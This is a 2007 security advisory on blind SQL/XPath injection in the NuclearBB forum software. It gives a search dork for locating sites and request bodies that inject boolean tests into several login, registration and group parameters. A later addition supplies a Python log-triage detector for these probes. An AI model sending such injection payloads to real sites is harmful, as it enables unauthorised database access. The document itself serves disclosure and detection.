NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


=============
String Inputs
=============
----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xyz.com"+and+"1"="0 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com"+and+"1"="0 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com"+and+"1"="0 
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0 

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz@xyz.com 
email=xyz@xyz.com+and+1=0 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over&register_submit=Register


John Martinelli
john@martinelli.com 
http://john-martinelli.com 

April 18th, 2007
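
Added example (not part of the original advisory, and not NuclearBB code): a log-triage check that flags requests to the scripts and parameters listed above when a value carries an appended boolean test, and reports whether it matches the string or the numeric form. The function name, the regular expression and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Scripts and parameters listed in the advisory.
WATCHED = {
    "login.php": {"submit"},
    "register.php": {"website", "aol", "signature", "email"},
    "groups.php": {"g"},
}

# A boolean test appended to a value. A leading quote means the value tries to
# close a quoted SQL literal first (the advisory's "String Inputs" form);
# without it the test is appended directly (the "Numeric Inputs" form).
PROBE = re.compile(
    r"""(?P<quote>["'])?\s+(?:and|or)\s+["']?\w+["']?\s*=\s*["']?\w+""",
    re.IGNORECASE,
)

def flag_probes(method, url, body=""):
    """Map each watched parameter carrying an appended boolean test to its form."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    raw = parts.query if method.upper() == "GET" else body
    hits = {}
    # parse_qsl percent-decodes and turns '+' into a space, as the server does.
    for name, value in parse_qsl(raw, keep_blank_values=True):
        if name not in WATCHED.get(script, ()):
            continue
        match = PROBE.search(value)
        if match:
            hits[name] = "string" if match.group("quote") else "numeric"
    return hits

# Constructed sample requests (method, URL, body); not captured traffic.
SAMPLES = [
    ("GET", "http://www.example.com/groups.php?g=1+and+1=0", ""),
    ("POST", "http://www.example.com/login.php",
     "username=xyz&password=passxyz&submit=Login%22+and+%221%22%3D%220"),
    ("POST", "http://www.example.com/register.php",
     "username=xyz&email=xyz%40xyz.com&signature=Tom+and+Jerry&coppa_state=over"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(method, url, flag_probes(method, url, body))
```

The pattern is a triage heuristic and can match ordinary text that happens to contain "and x = y"; a hit marks a request for review and does not replace binding these parameters as query parameters in the application.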
